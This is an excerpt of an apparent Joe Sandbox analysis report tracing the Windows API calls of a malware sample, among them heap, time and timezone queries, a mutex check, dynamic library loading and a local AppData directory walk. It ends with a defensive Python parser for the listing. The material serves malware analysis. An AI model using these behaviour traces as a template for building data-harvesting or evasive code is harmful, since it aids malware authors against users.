                                            • Instruction ID: 00b8f11802350879da2f48f994a3402685e81a03bb9fbbc5a705ab0f2c9afdf1
                                            • Opcode Fuzzy Hash: bbbcb8835864335667ee073c6e85149c6edd079fa0b75eecad9fe8ddf8d51a3e
                                            • Instruction Fuzzy Hash: 7D110774900209EFCB04DFA5D948AFDBB75AF44309F10806AE919A6250E7705B45CF56
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 00417B40
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DE8,00000000,?), ref: 00417B47
                                            • GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 00417B54
                                            • wsprintfA.USER32 ref: 00417B83
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocLocalProcessTimewsprintf
                                            • String ID:
                                            • API String ID: 1243822799-0
                                            • Opcode ID: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                            • Instruction ID: c3980473cd5af67d898b1e7796d4e9c7fbcb3b6a311921eeb92eb57329937120
                                            • Opcode Fuzzy Hash: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                            • Instruction Fuzzy Hash: D4112AB2D09218ABCB14DBC9DD45BBEB7B9EB4CB11F10411AF605A2280E3395940C7B5
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 02467DA7
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02467DAE
                                            • GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 02467DBB
                                            • wsprintfA.USER32 ref: 02467DEA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                                            • String ID:
                                            • API String ID: 377395780-0
                                            • Opcode ID: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                            • Instruction ID: 438f37cb542d8153e31358817441bc78712fa5850480272bbcc9d2e7e3f615dc
                                            • Opcode Fuzzy Hash: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
                                            • Instruction Fuzzy Hash: 59112AB2D09218ABCB14DBC9DD45BBEB7B9EB4CB11F10411AF605A2280E2395940C7B5
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,006D6C48,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 02467E5A
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02467E61
                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,006D6C48,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 02467E74
                                            • wsprintfA.USER32 ref: 02467EAE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                            • String ID:
                                            • API String ID: 3317088062-0
                                            • Opcode ID: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                            • Instruction ID: 00848daba5539e7869ebc0f73f214482f36b691fda80b3c4dbc9d5295b9b052f
                                            • Opcode Fuzzy Hash: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                            • Instruction Fuzzy Hash: F5118EB1E06228EBEB208B54DC49FA9BB78FB05711F104396F619A72C0D7745A448B56
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strtok_s
                                            • String ID:
                                            • API String ID: 3330995566-0
                                            • Opcode ID: 73115bc3e8dcdeda032c09e7c013334606f369b6221bc6f187dc429dd98a48c5
                                            • Instruction ID: 08f0fedab4db2d0ce08bcca965be1b8535233777de7ca2bb59a02be86ac7dd2a
                                            • Opcode Fuzzy Hash: 73115bc3e8dcdeda032c09e7c013334606f369b6221bc6f187dc429dd98a48c5
                                            • Instruction Fuzzy Hash: DA112A70E0024A9FDB14DFEAD948BEEBBB9EF04B04F00805AE515BA251D7749501CF56
                                            APIs
                                            • CreateFileA.KERNEL32(02463FA5,80000000,00000003,00000000,00000003,00000080,00000000,?,02463FA5,?), ref: 024696F3
                                            • GetFileSizeEx.KERNEL32(000000FF,02463FA5), ref: 02469710
                                            • CloseHandle.KERNEL32(000000FF), ref: 0246971E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseCreateHandleSize
                                            • String ID:
                                            • API String ID: 1378416451-0
                                            • Opcode ID: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                            • Instruction ID: e28fb5f14898db79e4da232200553939752c2c26c0d7e01f8fc2e2f292b9d3e2
                                            • Opcode Fuzzy Hash: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                            • Instruction Fuzzy Hash: 8FF04979E14208FBDB14DFB0EC49FAE77BAAB48711F10C656FA11A72C0E670A6018B41
                                            APIs
                                            • LoadLibraryA.KERNEL32(004212DC), ref: 0245A2FF
                                            • GetProcAddress.KERNEL32(006D70A8,004212F8), ref: 0245A325
                                            • GetProcAddress.KERNEL32(006D70A8,00421310), ref: 0245A33C
                                            • FreeLibrary.KERNEL32(006D70A8), ref: 0245A360
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressLibraryProc$FreeLoad
                                            • String ID:
                                            • API String ID: 2256533930-0
                                            • Opcode ID: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                            • Instruction ID: 1b7579a829e9de2bfd41852c5d96289d731614ceb1432b30b24f88d099409971
                                            • Opcode Fuzzy Hash: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                            • Instruction Fuzzy Hash: E9F0F9B4A0A230EFD7009B65FD48B5637A6F308745F546627F905872E1E3B45484CB26
                                            APIs
                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 02466FD1
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02466FEF
                                            • CloseHandle.KERNEL32(00000000), ref: 02467000
                                            • Sleep.KERNEL32(00001770), ref: 0246700B
                                            • CloseHandle.KERNEL32(?,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 02467021
                                            • ExitProcess.KERNEL32 ref: 02467029
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                            • String ID:
                                            • API String ID: 941982115-0
                                            • Opcode ID: cbc054f6a7ed638df2ab0a9ffd5acb2e6cab1cfb1d0e0230c636362dfaef6af4
                                            • Instruction ID: 9c7239d9bbc0d47bfba6a233743599d1bf19b6e8e1b104a9d9c66c9330de5a75
                                            • Opcode Fuzzy Hash: cbc054f6a7ed638df2ab0a9ffd5acb2e6cab1cfb1d0e0230c636362dfaef6af4
                                            • Instruction Fuzzy Hash: B8F05E70948216EEE720ABE0DC0CB7EBB7AFB04705F10091BB512A11D0DBB45540CE63
                                            APIs
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 024CEE8E
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 024CEF42
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3480331319-1018135373
                                            • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                            • Instruction ID: e5b674561c9177c2eea362895b1ccf94111ebd5580c636e1129c9cd1deb51a2f
                                            • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                            • Instruction Fuzzy Hash: 7E41B278A00218EBCF50EF6DC894AAEBBA6BF45314F24815BE9199B391D7319911CF90
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Catch
                                            • String ID: MOC$RCC
                                            • API String ID: 78271584-2084237596
                                            • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                            • Instruction ID: ab5317a3c17169c4be5292fc081615760cb331461e7e5fe00554449fd2685f5c
                                            • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                            • Instruction Fuzzy Hash: EE414975900109AFCF15CF98CD81AEEBBB6BF48304F26805EE90566621D33AA954DF51
                                            APIs
                                              • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004152DA
                                            • lstrcatA.KERNEL32(?,009D06C0), ref: 004152F8
                                              • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                              • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                            • String ID: 9dA
                                            • API String ID: 2699682494-3568425128
                                            • Opcode ID: 5bb350bcbed3125f7e12a5500a4acbcaef6b2422d52e2d389edcc53ab9aa0019
                                            • Instruction ID: 7a1763d3762e4bc1164bf129b3bea8c613207f41675935a6caeb9cdf66552cef
                                            • Opcode Fuzzy Hash: 5bb350bcbed3125f7e12a5500a4acbcaef6b2422d52e2d389edcc53ab9aa0019
                                            • Instruction Fuzzy Hash: 4E01D6B6E0520867CB14FB71EC53EDE733D9B54305F00419EB64996091EE78ABC8CBA5
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                              • Part of subcall function 0246AD17: lstrcpy.KERNEL32(?,00000000), ref: 0246AD5D
                                              • Part of subcall function 0245A7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 0245A7E4
                                            • lstrlen.KERNEL32(00000000), ref: 0245BED6
                                              • Part of subcall function 02469227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02469249
                                            • StrStrA.SHLWAPI(00000000,0042143C), ref: 0245BF04
                                            • lstrlen.KERNEL32(00000000), ref: 0245BFDC
                                            • lstrlen.KERNEL32(00000000), ref: 0245BFF0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                            • String ID:
                                            • API String ID: 1440504306-0
                                            • Opcode ID: d650cb6ee135051a510d3b4860837fdfb72f530cdecf696837b7b8807095c46b
                                            • Instruction ID: d13349ae860b21203a8eb846dcad35c289ca4e8817364865cefe5472370111b1
                                            • Opcode Fuzzy Hash: d650cb6ee135051a510d3b4860837fdfb72f530cdecf696837b7b8807095c46b
                                            • Instruction Fuzzy Hash: 76B13472900628ABCB18FBA1DC59EFE773AEF14305F40456EE546B2190EF345A48CF62
                                            APIs
                                            • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
                                            • StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
                                            • StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
                                            • FindClose.KERNEL32(000000FF), ref: 00413ECC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$CloseFileNextlstrcat
                                            • String ID: q?A
                                            • API String ID: 3840410801-4084695119
                                            • Opcode ID: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
                                            • Instruction ID: 435e47d99a68a60cc5746cb21b8f71e50488397b794716e085ba6dfc691b5c27
                                            • Opcode Fuzzy Hash: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
                                            • Instruction Fuzzy Hash: B3D05B7190411D5BCB10EF64DD489EA7378EB55705F0041CAF40E97150FB349F858F55
                                            APIs
                                              • Part of subcall function 024691D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02469202
                                            • lstrcat.KERNEL32(?,00000000), ref: 02465431
                                            • lstrcat.KERNEL32(?,00421058), ref: 0246544E
                                            • lstrcat.KERNEL32(?,006D6FF8), ref: 02465462
                                            • lstrcat.KERNEL32(?,0042105C), ref: 02465474
                                              • Part of subcall function 02464DC7: wsprintfA.USER32 ref: 02464DE3
                                              • Part of subcall function 02464DC7: FindFirstFileA.KERNEL32(?,?), ref: 02464DFA
                                              • Part of subcall function 02464DC7: StrCmpCA.SHLWAPI(?,00420FC4), ref: 02464E28
                                              • Part of subcall function 02464DC7: StrCmpCA.SHLWAPI(?,00420FC8), ref: 02464E3E
                                              • Part of subcall function 02464DC7: FindNextFileA.KERNEL32(000000FF,?), ref: 02465034
                                              • Part of subcall function 02464DC7: FindClose.KERNEL32(000000FF), ref: 02465049
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                            • String ID:
                                            • API String ID: 2667927680-0
                                            • Opcode ID: 78196317b43d1ae5eb8e9dda45d5cf78e45a1aa527f945a7246ff9d6d1fdb0ea
                                            • Instruction ID: 734fbc32b868b2d7e2c134d56a1a5a616fe2d603e81483f80486105e5f9a14ec
                                            • Opcode Fuzzy Hash: 78196317b43d1ae5eb8e9dda45d5cf78e45a1aa527f945a7246ff9d6d1fdb0ea
                                            • Instruction Fuzzy Hash: B4218876D04218A7DB14FB70EC45EE9333E9B54300F40459BF59956190EE745ACC8FA2
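The function record above (the unpacked code at 02450000, "based on PE: false") resolves a shell folder with SHGetFolderPathA whose second argument is 0x1C (the documented value of CSIDL_LOCAL_APPDATA), builds a path with four lstrcat calls that append constants at fixed addresses, and then walks that directory with a FindFirstFileA / FindNextFileA / FindClose loop, comparing each entry against two constants with StrCmpCA. Added here as a triage helper, not part of the Joe Sandbox report or of the sample's own code: a Python parser for this APIs listing format that turns each bullet into a structured record, decodes the CSIDL argument, flags the directory-walk pattern and collects the constant pointer arguments to look up in the Strings and memory dump sections. The CSIDL table lists only common folder ids, the line layout assumed (`api.MODULE(args), ref: addr`, optionally prefixed by `Part of subcall function XXXXXXXX:`) is inferred from the lines on this page, and the embedded sample is the listing copied from the record above.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# CSIDL folder ids live in the low byte of the nFolder argument; the high byte
# carries CSIDL_FLAG_* bits (e.g. CSIDL_FLAG_CREATE = 0x8000) and is masked off.
CSIDL_NAMES = {
    0x00: "CSIDL_DESKTOP",
    0x05: "CSIDL_PERSONAL",        # My Documents
    0x1A: "CSIDL_APPDATA",         # %APPDATA% (roaming)
    0x1C: "CSIDL_LOCAL_APPDATA",   # %LOCALAPPDATA%
    0x23: "CSIDL_COMMON_APPDATA",  # %ProgramData%
    0x26: "CSIDL_PROGRAM_FILES",
    0x28: "CSIDL_PROFILE",         # %USERPROFILE%
}

@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple             # raw argument tokens; "?" means the sandbox could not resolve the value
    ref: int                # address of the call site
    subcall_of: int | None  # callee address when the line is "Part of subcall function"

# One bullet line of the report's APIs section (layout assumed from this page), e.g.
#   • lstrcat.KERNEL32(?,00421058), ref: 0246544E
#   • Part of subcall function 02464DC7: wsprintfA.USER32 ref: 02464DE3
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

def parse_api_block(text: str) -> list[ApiCall]:
    """Parse every API bullet line of one function record; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw is not None else ()
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls

def csidl_of(call: ApiCall) -> str | None:
    """Decode the nFolder argument (2nd parameter) of SHGetFolderPathA/W."""
    if not call.api.startswith("SHGetFolderPath") or len(call.args) < 2:
        return None
    try:
        n = int(call.args[1], 16)
    except ValueError:          # argument was recorded as "?"
        return None
    return CSIDL_NAMES.get(n & 0xFF, f"CSIDL_0x{n & 0xFF:02X}")

def string_pointers(calls: list[ApiCall]) -> list[int]:
    """Non-null constant pointer arguments of string APIs: addresses to pivot on in the dump."""
    addrs = set()
    for c in calls:
        if c.api.startswith(("lstrcat", "lstrcmp", "StrCmp", "wsprintf")):
            for a in c.args:
                if re.fullmatch(r"[0-9A-Fa-f]{8}", a) and int(a, 16) != 0:
                    addrs.add(int(a, 16))
    return sorted(addrs)

def enumerates_directory(calls: list[ApiCall]) -> bool:
    """True when the record contains a complete FindFirstFile / FindNextFile / FindClose walk."""
    apis = {c.api for c in calls}
    return (bool(apis & {"FindFirstFileA", "FindFirstFileW"})
            and bool(apis & {"FindNextFileA", "FindNextFileW"})
            and "FindClose" in apis)

def summarize(text: str) -> dict:
    calls = parse_api_block(text)
    folders = [f for f in (csidl_of(c) for c in calls) if f]
    return {
        "calls": len(calls),
        "folders": folders,
        "directory_walk": enumerates_directory(calls),
        "string_pointers": [f"{a:08X}" for a in string_pointers(calls)],
    }

# Sample input: the APIs listing of the function record above, copied verbatim.
REPORT_BLOCK = """\
APIs
  • Part of subcall function 024691D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02469202
• lstrcat.KERNEL32(?,00000000), ref: 02465431
• lstrcat.KERNEL32(?,00421058), ref: 0246544E
• lstrcat.KERNEL32(?,006D6FF8), ref: 02465462
• lstrcat.KERNEL32(?,0042105C), ref: 02465474
  • Part of subcall function 02464DC7: wsprintfA.USER32 ref: 02464DE3
  • Part of subcall function 02464DC7: FindFirstFileA.KERNEL32(?,?), ref: 02464DFA
  • Part of subcall function 02464DC7: StrCmpCA.SHLWAPI(?,00420FC4), ref: 02464E28
  • Part of subcall function 02464DC7: StrCmpCA.SHLWAPI(?,00420FC8), ref: 02464E3E
  • Part of subcall function 02464DC7: FindNextFileA.KERNEL32(000000FF,?), ref: 02465034
  • Part of subcall function 02464DC7: FindClose.KERNEL32(000000FF), ref: 02465049
Memory Dump Source
"""

if __name__ == "__main__":
    print(summarize(REPORT_BLOCK))
```

Running it on the copied record reports eleven calls, the folder CSIDL_LOCAL_APPDATA, a complete directory walk, and the five constant addresses 00420FC4, 00420FC8, 00421058, 0042105C and 006D6FF8. Note that the lstrcat and StrCmpCA constants fall inside the original image's address range (the 00400000 region, "based on PE: true") even though the calling code runs in the unpacked region at 02450000, so those addresses are best resolved in the first dump's Strings section rather than in the 02450000 dump.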